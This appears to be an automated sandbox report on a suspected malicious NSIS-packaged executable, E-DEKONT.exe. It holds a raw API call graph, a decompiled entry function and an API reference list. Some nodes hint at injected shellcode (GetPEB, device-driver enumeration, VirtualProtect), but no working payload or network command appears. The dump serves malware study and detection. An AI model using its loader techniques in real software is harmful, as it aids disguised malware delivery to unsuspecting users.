8831->8832 8833 4023f0 8832->8833 8834 402c37 17 API calls 8833->8834 8835 4023fa 8834->8835 8848 402cc7 8835->8848 8838 402432 8840 40243e 8838->8840 8842 402c15 17 API calls 8838->8842 8839 402c37 17 API calls 8841 402428 lstrlenW 8839->8841 8843 40245d RegSetValueExW 8840->8843 8852 4030fa 8840->8852 8841->8838 
8842->8840 8845 402473 RegCloseKey 8843->8845 8847 402885 8845->8847 8849 402ce2 8848->8849 8872 40611d 8849->8872 8854 403113 8852->8854 8853 403141 8876 403315 8853->8876 8854->8853 8879 40332b SetFilePointer 8854->8879 8858 4032ae 8861 4032f0 8858->8861 8864 4032b2 8858->8864 8859 40315e GetTickCount 8860 403298 8859->8860 8868 4031ad 8859->8868 8860->8843 8863 403315 ReadFile 8861->8863 8862 403315 ReadFile 8862->8868 8863->8860 8864->8860 8865 403315 ReadFile 8864->8865 8866 405e26 WriteFile 8864->8866 8865->8864 8866->8864 8867 403203 GetTickCount 8867->8868 8868->8860 8868->8862 8868->8867 8869 403228 MulDiv wsprintfW 8868->8869 8871 405e26 WriteFile 8868->8871 8870 4052e6 24 API calls 8869->8870 8870->8868 8871->8868 8873 40612c 8872->8873 8874 40240a 8873->8874 8875 406137 RegCreateKeyExW 8873->8875 8874->8838 8874->8839 8874->8847 8875->8874 8877 405df7 ReadFile 8876->8877 8878 40314c 8877->8878 8878->8858 8878->8859 8878->8860 8879->8853 10157 2b66d12 10158 2b66d27 GetPEB 10157->10158 10159 2b6352f 10157->10159 10158->10159 9821 4046e6 9822 404712 9821->9822 9823 404723 9821->9823 9882 4058c8 GetDlgItemTextW 9822->9882 9825 40472f GetDlgItem 9823->9825 9831 40478e 9823->9831 9828 404743 9825->9828 9826 404872 9832 404a21 9826->9832 9884 4058c8 GetDlgItemTextW 9826->9884 9827 40471d 9829 406516 5 API calls 9827->9829 9830 404757 SetWindowTextW 9828->9830 9834 405bfe 4 API calls 9828->9834 9829->9823 9835 404217 18 API calls 9830->9835 9831->9826 9831->9832 9836 4062a4 17 API calls 9831->9836 9838 40427e 8 API calls 9832->9838 9840 40474d 9834->9840 9841 404773 9835->9841 9842 404802 SHBrowseForFolderW 9836->9842 9837 4048a2 9843 405c5b 18 API calls 9837->9843 9839 404a35 9838->9839 9840->9830 9847 405b53 3 API calls 9840->9847 9844 404217 18 API calls 9841->9844 9842->9826 9845 40481a CoTaskMemFree 9842->9845 9846 4048a8 9843->9846 9848 404781 9844->9848 9849 405b53 3 API calls 9845->9849 9885 406282 lstrcpynW 9846->9885 9847->9830 9883 40424c 
SendMessageW 9848->9883 9851 404827 9849->9851 9854 40485e SetDlgItemTextW 9851->9854 9858 4062a4 17 API calls 9851->9858 9853 404787 9856 40665c 5 API calls 9853->9856 9854->9826 9855 4048bf 9857 40665c 5 API calls 9855->9857 9856->9831 9864 4048c6 9857->9864 9859 404846 lstrcmpiW 9858->9859 9859->9854 9862 404857 lstrcatW 9859->9862 9860 404907 9886 406282 lstrcpynW 9860->9886 9862->9854 9863 40490e 9865 405bfe 4 API calls 9863->9865 9864->9860 9868 405b9f 2 API calls 9864->9868 9870 40495f 9864->9870 9866 404914 GetDiskFreeSpaceW 9865->9866 9869 404938 MulDiv 9866->9869 9866->9870 9868->9864 9869->9870 9871 4049d0 9870->9871 9873 404b6b 20 API calls 9870->9873 9872 4049f3 9871->9872 9874 40140b 2 API calls 9871->9874 9887 404239 EnableWindow 9872->9887 9875 4049bd 9873->9875 9874->9872 9877 4049d2 SetDlgItemTextW 9875->9877 9878 4049c2 9875->9878 9877->9871 9880 404aa2 20 API calls 9878->9880 9879 404a0f 9879->9832 9888 40463f 9879->9888 9880->9871 9882->9827 9883->9853 9884->9837 9885->9855 9886->9863 9887->9879 9889 404652 SendMessageW 9888->9889 9890 40464d 9888->9890 9889->9832 9890->9889 8970 4027e9 8971 4027f0 8970->8971 8973 402a6a 8970->8973 8972 402c15 17 API calls 8971->8972 8974 4027f7 8972->8974 8975 402806 SetFilePointer 8974->8975 8975->8973 8976 402816 8975->8976 8978 4061c9 wsprintfW 8976->8978 8978->8973 9891 100018a9 9892 100018cc 9891->9892 9893 10001911 9892->9893 9894 100018ff GlobalFree 9892->9894 9895 10001272 2 API calls 9893->9895 9894->9893 9896 10001a87 GlobalFree GlobalFree 9895->9896 9897 401ced 9898 402c15 17 API calls 9897->9898 9899 401cf3 IsWindow 9898->9899 9900 401a20 9899->9900 9212 4024f2 9213 402c77 17 API calls 9212->9213 9214 4024fc 9213->9214 9215 402c15 17 API calls 9214->9215 9216 402505 9215->9216 9217 402885 9216->9217 9218 402521 RegEnumKeyW 9216->9218 9219 40252d RegEnumValueW 9216->9219 9220 402542 RegCloseKey 9218->9220 9219->9220 9220->9217 10160 2b69302 10161 2b86193 K32EnumDeviceDrivers 10160->10161 10162 
2b6352f 10160->10162 10161->10162 9905 4014f5 SetForegroundWindow 9906 402abf 9905->9906 9907 100016b6 9908 100016e5 9907->9908 9909 10001b18 22 API calls 9908->9909 9910 100016ec 9909->9910 9911 100016f3 9910->9911 9912 100016ff 9910->9912 9913 10001272 2 API calls 9911->9913 9914 10001726 9912->9914 9915 10001709 9912->9915 9918 100016fd 9913->9918 9916 10001750 9914->9916 9917 1000172c 9914->9917 9919 1000153d 3 API calls 9915->9919 9921 1000153d 3 API calls 9916->9921 9920 100015b4 3 API calls 9917->9920 9922 1000170e 9919->9922 9923 10001731 9920->9923 9921->9918 9924 100015b4 3 API calls 9922->9924 9926 10001272 2 API calls 9923->9926 9925 10001714 9924->9925 9927 10001272 2 API calls 9925->9927 9928 10001737 GlobalFree 9926->9928 9929 1000171a GlobalFree 9927->9929 9928->9918 9930 1000174b GlobalFree 9928->9930 9929->9918 9930->9918 9931 4020fe 9932 402c37 17 API calls 9931->9932 9933 402105 9932->9933 9934 402c37 17 API calls 9933->9934 9935 40210f 9934->9935 9936 402c37 17 API calls 9935->9936 9937 402119 9936->9937 9938 402c37 17 API calls 9937->9938 9939 402123 9938->9939 9940 402c37 17 API calls 9939->9940 9941 40212d 9940->9941 9942 40216c CoCreateInstance 9941->9942 9943 402c37 17 API calls 9941->9943 9946 40218b 9942->9946 9943->9942 9944 401423 24 API calls 9945 40224a 9944->9945 9946->9944 9946->9945 10163 4019ff 10164 402c37 17 API calls 10163->10164 10165 401a06 10164->10165 10166 402c37 17 API calls 10165->10166 10167 401a0f 10166->10167 10168 401a16 lstrcmpiW 10167->10168 10169 401a28 lstrcmpW 10167->10169 10170 401a1c 10168->10170 10169->10170 10171 2b64b77 10172 2b6477e 10171->10172 10173 2b71135 GetPEB 10172->10173 10174 2b64be4 10172->10174 10173->10174 8633 100027c2 8634 10002812 8633->8634 8635 100027d2 VirtualProtect 8633->8635 8635->8634 10175 401f86 10176 402c37 17 API calls 10175->10176 10177 401f8d 10176->10177 10178 40665c 5 API calls 10177->10178 10179 401f9c 10178->10179 10180 401fb8 GlobalAlloc 10179->10180 10189 402020 
10179->10189 10181 401fcc 10180->10181 10180->10189 10182 40665c 5 API calls 10181->10182 10183 401fd3 10182->10183 10184 40665c 5 API calls 10183->10184 10185 401fdd 10184->10185 10185->10189 10190 4061c9 wsprintfW 10185->10190 10187 402012 10191 4061c9 wsprintfW 10187->10191 10190->10187 10191->10189 8681 402388 8682 402390 8681->8682 8683 4023bb 8681->8683 8693 402c77 8682->8693 8684 402c37 17 API calls 8683->8684 8686 4023c2 8684->8686 8698 402cf5 8686->8698 8689 4023a1 8690 402c37 17 API calls 8689->8690 8691 4023a8 RegDeleteValueW RegCloseKey 8690->8691 8692 4023cf 8691->8692 8694 402c37 17 API calls 8693->8694 8695 402c8e 8694->8695 8696 4060ef RegOpenKeyExW 8695->8696 8697 402397 8696->8697 8697->8689 8697->8692 8699 402d0b 8698->8699 8701 402d21 8699->8701 8702 402d2a 8699->8702 8701->8692 8703 4060ef RegOpenKeyExW 8702->8703 8704 402d58 8703->8704 8705 402dd0 8704->8705 8707 402d5c 8704->8707 8705->8701 8706 402d7e RegEnumKeyW 8706->8707 8708 402d95 RegCloseKey 8706->8708 8707->8706 8707->8708 8709 402db6 RegCloseKey 8707->8709 8711 402d2a 6 API calls 8707->8711 8710 40665c 5 API calls 8708->8710 8709->8705 8712 402da5 8710->8712 8711->8707 8713 402dc4 RegDeleteKeyW 8712->8713 8714 402da9 8712->8714 8713->8705 8714->8705 9947 2b6927c 9948 2b6927f 9947->9948 9949 2b86193 K32EnumDeviceDrivers 9948->9949 9950 2b6352f 9949->9950 9951 401491 9952 4052e6 24 API calls 9951->9952 9953 401498 9952->9953 10192 402592 10193 4025c1 10192->10193 10194 4025a6 10192->10194 10196 4025f5 10193->10196 10197 4025c6 10193->10197 10195 402c15 17 API calls 10194->10195 10204 4025ad 10195->10204 10199 402c37 17 API calls 10196->10199 10198 402c37 17 API calls 10197->10198 10200 4025cd WideCharToMultiByte lstrlenA 10198->10200 10201 4025fc lstrlenW 10199->10201 10200->10204 10201->10204 10202 40263f 10203 402629 10203->10202 10205 405e26 WriteFile 10203->10205 10204->10202 10204->10203 10206 405e55 5 API calls 10204->10206 10205->10202 10206->10203 9954 402a9a SendMessageW 9955 
402ab4 InvalidateRect 9954->9955 9956 402abf 9954->9956 9955->9956 9957 40149e 9958 4022f1 9957->9958 9959 4014ac PostQuitMessage 9957->9959 9959->9958 9960 40469f 9961 4046d5 9960->9961 9962 4046af 9960->9962 9964 40427e 8 API calls 9961->9964 9963 404217 18 API calls 9962->9963 9966 4046bc SetDlgItemTextW 9963->9966 9965 4046e1 9964->9965 9966->9961 9967 100010e1 9968 10001111 9967->9968 9969 100011d8 GlobalFree 9968->9969 9970 100012ba 2 API calls 9968->9970 9971 100011d3 9968->9971 9972 10001272 2 API calls 9968->9972 9973 10001164 GlobalAlloc 9968->9973 9974 100011f8 GlobalFree 9968->9974 9975 100011c4 GlobalFree 9968->9975 9976 100012e1 lstrcpyW 9968->9976 9970->9968 9971->9969 9972->9975 9973->9968 9974->9968 9975->9968 9976->9968 8966 4015a3 8967 402c37 17 API calls 8966->8967 8968 4015aa SetFileAttributesW 8967->8968 8969 4015bc 8968->8969 9977 4028a7 9978 402c37 17 API calls 9977->9978 9979 4028b5 9978->9979 9980 4028cb 9979->9980 9981 402c37 17 API calls 9979->9981 9982 405d4f 2 API calls 9980->9982 9981->9980 9983 4028d1 9982->9983 10005 405d74 GetFileAttributesW CreateFileW 9983->10005 9985 4028de 9986 402981 9985->9986 9987 4028ea GlobalAlloc 9985->9987 9990 402989 DeleteFileW 9986->9990 9991 40299c 9986->9991 9988 402903 9987->9988 9989 402978 CloseHandle 9987->9989 10006 40332b SetFilePointer 9988->10006 9989->9986 9990->9991 9993 402909 9994 403315 ReadFile 9993->9994 9995 402912 GlobalAlloc 9994->9995 9996 402922 9995->9996 9997 402956 9995->9997 9998 4030fa 31 API calls 9996->9998 9999 405e26 WriteFile 9997->9999 10004 40292f 9998->10004 10000 402962 GlobalFree 9999->10000 10001 4030fa 31 API calls 10000->10001 10003 402975 10001->10003 10002 40294d GlobalFree 10002->9997 10003->9989 10004->10002 10005->9985 10006->9993 10207 401db3 GetDC 10208 402c15 17 API calls 10207->10208 10209 401dc5 GetDeviceCaps MulDiv ReleaseDC 10208->10209 10210 402c15 17 API calls 10209->10210 10211 401df6 10210->10211 10212 4062a4 17 API calls 10211->10212 10213 
401e33 CreateFontIndirectW 10212->10213 10214 40258c 10213->10214 10215 4043b4 10216 4043cc 10215->10216 10220 4044e6 10215->10220 10221 404217 18 API calls 10216->10221 10217 404550 10218 40461a 10217->10218 10219 40455a GetDlgItem 10217->10219 10224 40427e 8 API calls 10218->10224 10225 404574 10219->10225 10226 4045db 10219->10226 10220->10217 10220->10218 10222 404521 GetDlgItem SendMessageW 10220->10222 10223 404433 10221->10223 10248 404239 EnableWindow 10222->10248 10229 404217 18 API calls 10223->10229 10230 404615 10224->10230 10225->10226 10231 40459a SendMessageW LoadCursorW SetCursor 10225->10231 10226->10218 10227 4045ed 10226->10227 10232 404603 10227->10232 10233 4045f3 SendMessageW 10227->10233 10235 404440 CheckDlgButton 10229->10235 10249 404663 10231->10249 10232->10230 10237 404609 SendMessageW 10232->10237 10233->10232 10234 40454b 10238 40463f SendMessageW 10234->10238 10246 404239 EnableWindow 10235->10246 10237->10230 10238->10217 10241 40445e GetDlgItem 10247 40424c SendMessageW 10241->10247 10243 404474 SendMessageW 10244 404491 GetSysColor 10243->10244 10245 40449a SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 10243->10245 10244->10245 10245->10230 10246->10241 10247->10243 10248->10234 10252 4058aa ShellExecuteExW 10249->10252 10251 4045c9 LoadCursorW SetCursor 10251->10226 10252->10251 10253 2b69142 10254 2b691aa 10253->10254 10255 2b86193 K32EnumDeviceDrivers 10254->10255 10256 2b6352f 10254->10256 10255->10256 10012 4014b8 10013 4014be 10012->10013 10014 401389 2 API calls 10013->10014 10015 4014c6 10014->10015

                                                                            C-Code - Quality: 81%
                                                                            			_entry_() {
                                                                            				signed int _t51;
                                                                            				intOrPtr* _t56;
                                                                            				WCHAR* _t60;
                                                                            				char* _t63;
                                                                            				void* _t66;
                                                                            				void* _t68;
                                                                            				int _t70;
                                                                            				int _t72;
                                                                            				int _t75;
                                                                            				intOrPtr* _t76;
                                                                            				int _t77;
                                                                            				int _t79;
                                                                            				void* _t103;
                                                                            				signed int _t120;
                                                                            				void* _t123;
                                                                            				void* _t128;
                                                                            				intOrPtr _t147;
                                                                            				intOrPtr _t148;
                                                                            				intOrPtr* _t149;
                                                                            				int _t151;
                                                                            				void* _t154;
                                                                            				int _t155;
                                                                            				signed int _t159;
                                                                            				signed int _t164;
                                                                            				signed int _t169;
                                                                            				void* _t171;
                                                                            				WCHAR* _t172;
                                                                            				signed int _t175;
                                                                            				signed int _t178;
                                                                            				CHAR* _t179;
                                                                            				void* _t182;
                                                                            				int* _t184;
                                                                            				void* _t192;
                                                                            				char* _t193;
                                                                            				void* _t196;
                                                                            				void* _t197;
                                                                            				void* _t243;
                                                                            
                                                                            				_t171 = 0x20;
                                                                            				_t151 = 0;
                                                                            				 *(_t197 + 0x14) = 0;
                                                                            				 *(_t197 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                            				 *(_t197 + 0x1c) = 0;
                                                                            				SetErrorMode(0x8001); // executed
                                                                            				_t51 = GetVersion() & 0xbfffffff;
                                                                            				 *0x434eec = _t51;
                                                                            				if(_t51 != 6) {
                                                                            					_t149 = E0040665C(0);
                                                                            					if(_t149 != 0) {
                                                                            						 *_t149(0xc00);
                                                                            					}
                                                                            				}
                                                                            				_t179 = "UXTHEME";
                                                                            				goto L4;
                                                                            				L8:
                                                                            				__imp__#17(_t192);
                                                                            				__imp__OleInitialize(_t151); // executed
                                                                            				 *0x434fb8 = _t56;
                                                                            				SHGetFileInfoW(0x42b208, _t151, _t197 + 0x34, 0x2b4, _t151); // executed
                                                                            				E00406282(0x433ee0, L"NSIS Error");
                                                                            				_t60 = GetCommandLineW();
                                                                            				_t193 = L"\"C:\\Users\\Arthur\\Desktop\\E-DEKONT.exe\"";
                                                                            				E00406282(_t193, _t60);
                                                                            				 *0x434ee0 = GetModuleHandleW(_t151);
                                                                            				_t63 = _t193;
                                                                            				if(L"\"C:\\Users\\Arthur\\Desktop\\E-DEKONT.exe\"" == 0x22) {
                                                                            					_t63 =  &M0043F002;
                                                                            					_t171 = 0x22;
                                                                            				}
                                                                            				_t155 = CharNextW(E00405B80(_t63, _t171));
                                                                            				 *(_t197 + 0x18) = _t155;
                                                                            				_t66 =  *_t155;
                                                                            				if(_t66 == _t151) {
                                                                            					L33:
                                                                            					_t172 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                            					GetTempPathW(0x400, _t172);
                                                                            					_t68 = E00403342(_t155, 0);
                                                                            					_t225 = _t68;
                                                                            					if(_t68 != 0) {
                                                                            						L36:
                                                                            						DeleteFileW(L"1033"); // executed
                                                                            						_t70 = E00402EC1(_t227,  *(_t197 + 0x1c)); // executed
                                                                            						 *(_t197 + 0x10) = _t70;
                                                                            						if(_t70 != _t151) {
                                                                            							L48:
                                                                            							E004038B6();
                                                                            							__imp__OleUninitialize();
                                                                            							_t239 =  *(_t197 + 0x10) - _t151;
                                                                            							if( *(_t197 + 0x10) == _t151) {
                                                                            								__eflags =  *0x434f94 - _t151;
                                                                            								if( *0x434f94 == _t151) {
                                                                            									L72:
                                                                            									_t72 =  *0x434fac;
                                                                            									__eflags = _t72 - 0xffffffff;
                                                                            									if(_t72 != 0xffffffff) {
                                                                            										 *(_t197 + 0x10) = _t72;
                                                                            									}
                                                                            									ExitProcess( *(_t197 + 0x10));
                                                                            								}
                                                                            								_t75 = OpenProcessToken(GetCurrentProcess(), 0x28, _t197 + 0x14);
                                                                            								__eflags = _t75;
                                                                            								if(_t75 != 0) {
                                                                            									LookupPrivilegeValueW(_t151, L"SeShutdownPrivilege", _t197 + 0x20);
                                                                            									 *(_t197 + 0x34) = 1;
                                                                            									 *(_t197 + 0x40) = 2;
                                                                            									AdjustTokenPrivileges( *(_t197 + 0x28), _t151, _t197 + 0x24, _t151, _t151, _t151);
                                                                            								}
                                                                            								_t76 = E0040665C(4);
                                                                            								__eflags = _t76 - _t151;
                                                                            								if(_t76 == _t151) {
                                                                            									L70:
                                                                            									_t77 = ExitWindowsEx(2, 0x80040002);
                                                                            									__eflags = _t77;
                                                                            									if(_t77 != 0) {
                                                                            										goto L72;
                                                                            									}
                                                                            									goto L71;
                                                                            								} else {
                                                                            									_t79 =  *_t76(_t151, _t151, _t151, 0x25, 0x80040002);
                                                                            									__eflags = _t79;
                                                                            									if(_t79 == 0) {
                                                                            										L71:
                                                                            										E0040140B(9);
                                                                            										goto L72;
                                                                            									}
                                                                            									goto L70;
                                                                            								}
                                                                            							}
                                                                            							E004058E4( *(_t197 + 0x10), 0x200010);
                                                                            							ExitProcess(2);
                                                                            						}
                                                                            						if( *0x434f00 == _t151) {
                                                                            							L47:
                                                                            							 *0x434fac =  *0x434fac | 0xffffffff;
                                                                            							 *(_t197 + 0x14) = E00403990( *0x434fac);
                                                                            							goto L48;
                                                                            						}
                                                                            						_t184 = E00405B80(_t193, _t151);
                                                                            						if(_t184 < _t193) {
                                                                            							L44:
                                                                            							_t236 = _t184 - _t193;
                                                                            							 *(_t197 + 0x10) = L"Error launching installer";
                                                                            							if(_t184 < _t193) {
                                                                            								_t182 = E0040584F(_t239);
                                                                            								lstrcatW(_t172, L"~nsu");
                                                                            								if(_t182 != _t151) {
                                                                            									lstrcatW(_t172, "A");
                                                                            								}
                                                                            								lstrcatW(_t172, L".tmp");
                                                                            								_t195 = L"C:\\Users\\Arthur\\Desktop";
                                                                            								if(lstrcmpiW(_t172, L"C:\\Users\\Arthur\\Desktop") != 0) {
                                                                            									_push(_t172);
                                                                            									if(_t182 == _t151) {
                                                                            										E00405832();
                                                                            									} else {
                                                                            										E004057B5();
                                                                            									}
                                                                            									SetCurrentDirectoryW(_t172);
                                                                            									_t243 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra" - _t151; // 0x43
                                                                            									if(_t243 == 0) {
                                                                            										E00406282(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra", _t195);
                                                                            									}
                                                                            									E00406282(0x435000,  *(_t197 + 0x18));
                                                                            									_t156 = "A" & 0x0000ffff;
                                                                            									 *0x435800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                            									_t196 = 0x1a;
                                                                            									do {
                                                                            										E004062A4(_t151, _t172, 0x42aa08, 0x42aa08,  *((intOrPtr*)( *0x434ef4 + 0x120)));
                                                                            										DeleteFileW(0x42aa08);
                                                                            										if( *(_t197 + 0x10) != _t151 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\E-DEKONT.exe", 0x42aa08, 1) != 0) {
                                                                            											E00406048(_t156, 0x42aa08, _t151);
                                                                            											E004062A4(_t151, _t172, 0x42aa08, 0x42aa08,  *((intOrPtr*)( *0x434ef4 + 0x124)));
                                                                            											_t103 = E00405867(0x42aa08);
                                                                            											if(_t103 != _t151) {
                                                                            												CloseHandle(_t103);
                                                                            												 *(_t197 + 0x10) = _t151;
                                                                            											}
                                                                            										}
                                                                            										 *0x435800 =  *0x435800 + 1;
                                                                            										_t196 = _t196 - 1;
                                                                            									} while (_t196 != 0);
                                                                            									E00406048(_t156, _t172, _t151);
                                                                            								}
                                                                            								goto L48;
                                                                            							}
                                                                            							 *_t184 = _t151;
                                                                            							_t185 =  &(_t184[2]);
                                                                            							if(E00405C5B(_t236,  &(_t184[2])) == 0) {
                                                                            								goto L48;
                                                                            							}
                                                                            							E00406282(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra", _t185);
                                                                            							E00406282(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra\\Sldede", _t185);
                                                                            							 *(_t197 + 0x10) = _t151;
                                                                            							goto L47;
                                                                            						}
                                                                            						asm("cdq");
                                                                            						asm("cdq");
                                                                            						asm("cdq");
                                                                            						_t159 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                            						_t120 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t164 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                                            						while( *_t184 != _t159 || _t184[1] != _t120) {
                                                                            							_t184 = _t184;
                                                                            							if(_t184 >= _t193) {
                                                                            								continue;
                                                                            							}
                                                                            							break;
                                                                            						}
                                                                            						_t151 = 0;
                                                                            						goto L44;
                                                                            					}
                                                                            					GetWindowsDirectoryW(_t172, 0x3fb);
                                                                            					lstrcatW(_t172, L"\\Temp");
                                                                            					_t123 = E00403342(_t155, _t225);
                                                                            					_t226 = _t123;
                                                                            					if(_t123 != 0) {
                                                                            						goto L36;
                                                                            					}
                                                                            					GetTempPathW(0x3fc, _t172);
                                                                            					lstrcatW(_t172, L"Low");
                                                                            					SetEnvironmentVariableW(L"TEMP", _t172);
                                                                            					SetEnvironmentVariableW(L"TMP", _t172);
                                                                            					_t128 = E00403342(_t155, _t226);
                                                                            					_t227 = _t128;
                                                                            					if(_t128 == 0) {
                                                                            						goto L48;
                                                                            					}
                                                                            					goto L36;
                                                                            				} else {
                                                                            					do {
                                                                            						_t154 = 0x20;
                                                                            						if(_t66 != _t154) {
                                                                            							L13:
                                                                            							if( *_t155 == 0x22) {
                                                                            								_t155 = _t155 + 2;
                                                                            								_t154 = 0x22;
                                                                            							}
                                                                            							if( *_t155 != 0x2f) {
                                                                            								goto L27;
                                                                            							} else {
                                                                            								_t155 = _t155 + 2;
                                                                            								if( *_t155 == 0x53) {
                                                                            									_t148 =  *((intOrPtr*)(_t155 + 2));
                                                                            									if(_t148 == 0x20 || _t148 == 0) {
                                                                            										 *0x434fa0 = 1;
                                                                            									}
                                                                            								}
                                                                            								asm("cdq");
                                                                            								asm("cdq");
                                                                            								_t169 = L"NCRC" & 0x0000ffff;
                                                                            								asm("cdq");
                                                                            								_t175 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t169;
                                                                            								if( *_t155 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t169) &&  *((intOrPtr*)(_t155 + 4)) == _t175) {
                                                                            									_t147 =  *((intOrPtr*)(_t155 + 8));
                                                                            									if(_t147 == 0x20 || _t147 == 0) {
                                                                            										 *(_t197 + 0x1c) =  *(_t197 + 0x1c) | 0x00000004;
                                                                            									}
                                                                            								}
                                                                            								asm("cdq");
                                                                            								asm("cdq");
                                                                            								_t164 = L" /D=" & 0x0000ffff;
                                                                            								asm("cdq");
                                                                            								_t178 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t164;
                                                                            								if( *(_t155 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t164) ||  *_t155 != _t178) {
                                                                            									goto L27;
                                                                            								} else {
                                                                            									 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
                                                                            									__eflags = _t155;
                                                                            									E00406282(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra", _t155);
                                                                            									L32:
                                                                            									_t151 = 0;
                                                                            									goto L33;
                                                                            								}
                                                                            							}
                                                                            						} else {
                                                                            							goto L12;
                                                                            						}
                                                                            						do {
                                                                            							L12:
                                                                            							_t155 = _t155 + 2;
                                                                            						} while ( *_t155 == _t154);
                                                                            						goto L13;
                                                                            						L27:
                                                                            						_t155 = E00405B80(_t155, _t154);
                                                                            						if( *_t155 == 0x22) {
                                                                            							_t155 = _t155 + 2;
                                                                            						}
                                                                            						_t66 =  *_t155;
                                                                            					} while (_t66 != 0);
                                                                            					goto L32;
                                                                            				}
                                                                            				L4:
                                                                            				E004065EC(_t179); // executed
                                                                            				_t179 =  &(_t179[lstrlenA(_t179) + 1]);
                                                                            				if( *_t179 != 0) {
                                                                            					goto L4;
                                                                            				} else {
                                                                            					E0040665C(0xa);
                                                                            					 *0x434ee4 = E0040665C(8);
                                                                            					_t56 = E0040665C(6);
                                                                            					if(_t56 != _t151) {
                                                                            						_t56 =  *_t56(0x1e);
                                                                            						if(_t56 != 0) {
                                                                            							 *0x434eef =  *0x434eef | 0x00000040;
                                                                            						}
                                                                            					}
                                                                            					goto L8;
                                                                            				}
                                                                            			}









































                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE ref: 00403396
                                                                            • GetVersion.KERNEL32 ref: 0040339C
                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033CF
                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040340C
                                                                            • OleInitialize.OLE32(00000000), ref: 00403413
                                                                            • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040342F
                                                                            • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403444
                                                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\E-DEKONT.exe",00000000,?,00000006,00000008,0000000A), ref: 00403457
                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\E-DEKONT.exe",00000020,?,00000006,00000008,0000000A), ref: 0040347E
                                                                              • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                              • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035B8
                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C9
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035D5
                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E9
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035F1
                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403602
                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040360A
                                                                            • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361E
                                                                              • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E9
                                                                            • ExitProcess.KERNEL32 ref: 0040370A
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040371D
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040372C
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403737
                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\E-DEKONT.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403743
                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040375F
                                                                            • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037B9
                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\E-DEKONT.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037CD
                                                                            • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 004037FA
                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403829
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403830
